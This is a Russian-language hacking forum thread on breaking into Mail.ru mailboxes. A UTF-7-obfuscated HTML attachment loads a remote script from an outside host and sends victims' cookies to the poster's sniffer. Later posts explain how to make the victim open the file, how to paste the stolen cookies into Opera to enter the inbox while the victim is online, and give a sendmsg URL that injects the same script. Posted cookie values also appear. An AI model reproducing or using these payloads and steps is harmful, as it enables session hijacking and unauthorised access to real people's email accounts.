Взлом Майл.ру жертва должна будет скачать и открыть прикреплённый файл в хтмл формате <html> <meta http-equiv="Content-Type" content="text/html; charset=UTF-7"> <TABLE><TD BACKGROUND="+ACYAIw-106+ACYAIw-97+ACYAIw-118+ACYAIw-97+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116: document.write('+ACYAIw-60+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116 SRC=http://devarsiv.org/alex/j.js> </SCRIPT>')"> </html> куки придут на мой сниффер вы можете воспользоваться ими по адресу:www.devarsiv.org/alex/alex.php сейчас сделаю видео ! удачи!
Сделав как описанно выше на сниффер пришло следующее: "REFERER=http://win.mail.ru/cgi-bin/readmsg/1.html?id=11601349480000001767;0;1&mode=attachment&channel=¬ype" Что-то не так делаю или что? Ведь сессии самой то нет...
Если сработает то будет круто.... а сниф может не сработать? иногда бывает что приходит пустые логи..
Если я ничего не путаю, то я вижу следующее: Примеры, которые привел Actu@l SpY не будут работать хотя бы по той причине, что пути такого как "http://win.mail.ru/session/......" нет уже...в данный момент "http://win.mail.ru/cgi-bin/..." Сессию сниффер никак не может утянуть... По крайней мере у меня не получилось, хотел делал точно все так, как описано выше... Может подскажите в чем моя ошибка?
до того момента как я выложил багу на форуме всё работало, буквально через 30 минут,эту багу прикрыли ,остался только вариант через мой сниффер и то по непонятным причинам попасть в инбокс через оперу по свежим кукам стало проблематично
nc.STRIEM подтвердит, что сегодня он побывал у меня-же в инбоксе,приведённым мной вариантом,,а через пол чеса облом, багу видимо прикрыли,но всё-же подменив куки в опере мы попадем в инбокс,на то время пока жертва будет в он-лине
Actu@l SpY Ну это для нас давно не секрет, что люди с mail.ru тоже тут тусуються, потому как бы стараемся что-то свеженькое и горячее переносить в закрытую зону. P.S. В этот раз меня терзали смутные сомнения, убрать ли тему выше или оставить тут. Оставил ). Результат на лицо
ЭТУ XSS не прикрыли! прост чеб она выполнилась недостаточно открыть письмо! Отсылаеться она так: сохраняеться в html файл, после чего файл прикрепляеться к письму! потом при прочтение письма жертва должна нажать "скачать" прикрепленный файл, и в появившемся окошке нажать кнопку открыть! собсно вот так))) тогда срабатывает, и куки уплывают.......
на мaйл.ру вопше по себе ху* знает какие у них там глиуки на сервере ,вчера вечером сниффер перестал выдёргивать сессию ,сегодня сессия и куки выдёргиваетса нормально. когда на сниффер приходит куки и путь к ящику: http://win.mail.ru/cgi-bin/ то надо менять cookie в опере в каждый параметр вставляете своё значение например так: заходите к себе на емаил через оперу дальше в инструменты,настройки,куки ,управление cookies ,виде-те @майл.ру кликнете на логотип открывается табло с куками: c8: 71gpRQAAAAD1LAEAAAAAARAQAAAAABGR0BAAAAAAD7iAEAA Mpop:1160300756:4d50560750005024f6a5d5e465e0404090c1d010c00184958520c44115c565c5b1b4341:[email protected]: Mpopl:63920967 mrcu:FDD24528E35C2CFCD118A66742 p:g20EAEr/eAA t:bLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABAAAAAAAABgMpgcA теперь меняете каждый параметр на то,что утянул сниффер вход:http://win.mail.ru/cgi-bin/start утенулась сессия то куки подменивать в Опере не нужно,на тот момент пока жертва в онлайне читает письмо вы входите так : http://win.mail.ru/session/5a0f5b647243746f19050219091d011b0007014f6a5d5e465e0704091b02747b1f5c504350555842105b5c44411f4642/start остальное вот это:/readmsg/document.html?id=11603102580000017668;0;1&mode=attachment&channel=¬ype удаляете если не разберётесь стучите ,всем удачи
выше приведённый мной вариант срабатывает и на Рамблер.ру ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT> но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>